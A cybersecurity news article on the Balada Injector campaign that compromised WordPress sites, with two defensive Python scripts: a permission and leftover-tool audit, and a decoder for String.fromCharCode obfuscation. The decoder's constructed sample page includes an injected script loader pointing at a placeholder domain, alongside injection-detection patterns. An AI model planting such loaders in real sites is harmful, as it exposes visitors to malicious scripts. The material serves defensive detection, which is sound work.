“Massive Balada Injector Malware Campaign Infects Over 1 Million WordPress Sites”


April 10, 2023
Nextdoorsec-course

A malicious campaign named Balada Injector has reportedly infected over one million WordPress websites since 2017. GoDaddy’s Sucuri has noted that the campaign exploits all known and recently discovered vulnerabilities in WordPress plugins and themes to infiltrate the sites. 

The attackers favour String.fromCharCode obfuscation, use freshly registered domain names that host malicious scripts on random subdomains, and redirect visitors to various scam sites.

The malware creates fake WordPress admin users, harvests data from the underlying hosts, and leaves backdoors for continued access. In addition, the attacks search for tools such as adminer and phpMyAdmin that site administrators may have left behind after completing maintenance tasks, which lets the attackers read or download arbitrary site files, including backups, database dumps, and log and error files.

Massive Balada Injector Malware


Furthermore, the Balada Injector campaign relies on over 100 domains and many methods to exploit known security flaws, including HTML injection and siteurl injection. The attackers primarily attempt to obtain the database credentials stored in the wp-config.php file, and the attacks are engineered to read or download arbitrary site files.

The compromised site's top-level directories are further searched for writable directories that belong to other sites on the same host. Compromising just one site can therefore grant access to several other sites at no extra effort.

If these attack pathways are unavailable, the admin password is brute-forced using a batch of 74 predefined credentials. WordPress site owners should keep their website software up to date, uninstall unused plugins and themes, and use strong WordPress admin passwords.
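The three host-side conditions described above (leftover adminer/phpMyAdmin tools, readable wp-config.php credentials, and directories writable by neighbouring sites) can be checked with a short audit script. The following is an added example written for this article, not code from Sucuri or from the Balada report; the finding names, the list of tool file names and the temporary sample site it builds are this example's own assumptions.

```python
"""Post-maintenance hygiene audit for a WordPress document root.

Added example (not from the article or from Sucuri). Walks a site's
document root and flags the conditions the campaign is described as
abusing: leftover database tools (adminer, phpMyAdmin), a wp-config.php
readable by other local users, and directories writable by other users,
which could let one compromised site write into a neighbour. The sample
site tree is constructed in a temporary directory for demonstration.
"""
import os
import stat
import tempfile
from pathlib import Path

# Leftover maintenance tools named in the article. The concrete file and
# directory names below are common deployment names (an assumption here).
LEFTOVER_TOOL_NAMES = {"adminer.php", "adminer", "phpmyadmin"}


def audit_docroot(root: str) -> list[tuple[str, str]]:
    """Return sorted (finding-kind, path) tuples for the tree under root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(Path(root)):
        d = Path(dirpath)

        # 1. Leftover admin tools anywhere under the document root.
        for name in dirnames + filenames:
            if name.lower() in LEFTOVER_TOOL_NAMES:
                findings.append(("leftover-tool", str(d / name)))

        # 2. Directories writable by "other": a neighbouring site on the same
        #    host could drop files here.
        if d.stat().st_mode & stat.S_IWOTH:
            findings.append(("world-writable-dir", str(d)))

        # 3. wp-config.php readable by "other" exposes the DB credentials.
        if "wp-config.php" in filenames:
            cfg = d / "wp-config.php"
            if cfg.stat().st_mode & stat.S_IROTH:
                findings.append(("wp-config-world-readable", str(cfg)))
    return sorted(findings)


def build_sample_site() -> str:
    """Construct a deliberately misconfigured sample site in a temp dir."""
    root = tempfile.mkdtemp(prefix="wp-audit-")
    site = Path(root) / "site"
    uploads = site / "wp-content" / "uploads"
    uploads.mkdir(parents=True)
    cfg = site / "wp-config.php"
    cfg.write_text("<?php define('DB_PASSWORD', 'placeholder-not-real');\n")
    os.chmod(cfg, 0o644)            # readable by everyone: flagged
    (site / "adminer.php").write_text("<?php // leftover tool placeholder\n")
    os.chmod(uploads, 0o777)        # writable by everyone: flagged
    return str(site)


if __name__ == "__main__":
    for kind, path in audit_docroot(build_sample_site()):
        print(f"{kind:26s} {path}")
```

Run it against a real document root with `audit_docroot("/var/www/example")`; a clean site yields an empty list. The permission checks look only at the "other" bits, so a shared-host setup where sites run as distinct users is covered, while a single-user host would need group bits considered as well.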

The report comes after Doctor Web discovered a Linux malware family that exploits flaws in over two dozen plugins and themes to endanger vulnerable WordPress sites. Weeks later, Palo Alto Networks Unit 42 found a comparable vicious JavaScript injection campaign that redirects site visitors to adware and scam pages, affecting over 51,000 websites since 2022. 

The attackers use String.fromCharCode as an obfuscation technique to inject malicious JavaScript into the homepages of compromised websites, likely targeting legitimate users, who are most likely to visit a site's homepage.
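Both campaigns above hide the injected script behind String.fromCharCode, so a defender reviewing page source wants to decode those calls rather than read numbers. The following scanner is an added example for this article (not code from Sucuri, Unit 42 or Doctor Web); the sample page it scans is constructed, and the placeholder URL it encodes is not a real indicator.

```python
"""Find and decode String.fromCharCode-obfuscated strings in page source.

Added example (not from the article or the vendors it cites). Locates every
String.fromCharCode(...) call in an HTML/JS document, decodes the character
codes, and tags the recovered text with simple indicators so an analyst can
see at a glance whether an obfuscated snippet loads a remote script.
"""
import re

# Matches String.fromCharCode( 104, 116, ... ) allowing arbitrary whitespace.
FROMCHARCODE_RE = re.compile(
    r"String\.fromCharCode\s*\(\s*([0-9]+(?:\s*,\s*[0-9]+)*)\s*\)"
)


def decode_fromcharcode(arg_list: str) -> str:
    """Turn the comma-separated argument list into the string it encodes."""
    return "".join(chr(int(n)) for n in arg_list.split(","))


def encode_fromcharcode(text: str) -> str:
    """Inverse helper, used only to build the constructed sample below."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in text) + ")"


def risk_indicators(decoded: str) -> list[str]:
    """Coarse hints about what a decoded string is used for."""
    low = decoded.lower()
    hints = []
    if low.startswith(("http://", "https://", "//")):
        hints.append("remote-url")
    if ".js" in low:
        hints.append("script-file")
    if "<script" in low or "document.write" in low or "appendchild" in low:
        hints.append("dom-injection")
    return hints


def find_obfuscated_strings(source: str) -> list[dict]:
    """Return one record per String.fromCharCode call found in source."""
    findings = []
    for m in FROMCHARCODE_RE.finditer(source):
        decoded = decode_fromcharcode(m.group(1))
        findings.append({
            "offset": m.start(),
            "decoded": decoded,
            "indicators": risk_indicators(decoded),
        })
    return findings


# Constructed sample: a benign page with one injected loader. The URL is a
# placeholder under the reserved .invalid TLD, not an indicator from the report.
PLACEHOLDER_URL = "https://placeholder-domain.invalid/loader.js"
SAMPLE_HTML = (
    "<html><body><h1>Welcome</h1>\n"
    "<script>var s=document.createElement('script');"
    "s.src=" + encode_fromcharcode(PLACEHOLDER_URL) + ";"
    "document.head.appendChild(s);</script>\n"
    "</body></html>\n"
)


if __name__ == "__main__":
    for f in find_obfuscated_strings(SAMPLE_HTML):
        print(f"offset {f['offset']}: {f['decoded']!r} {f['indicators']}")
```

Point `find_obfuscated_strings` at the saved homepage source of a suspect site (`open("index.html").read()`); a clean WordPress theme normally produces no matches, and any match decoding to a URL on an unfamiliar domain deserves a closer look. The regex deliberately ignores calls whose arguments are expressions rather than literal numbers, so a decoded-but-empty result list does not by itself prove a page is clean.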

Saher

Author

Saher is a cybersecurity researcher with a passion for innovative technology and AI. She explores the intersection of AI and cybersecurity to stay ahead of evolving threats.
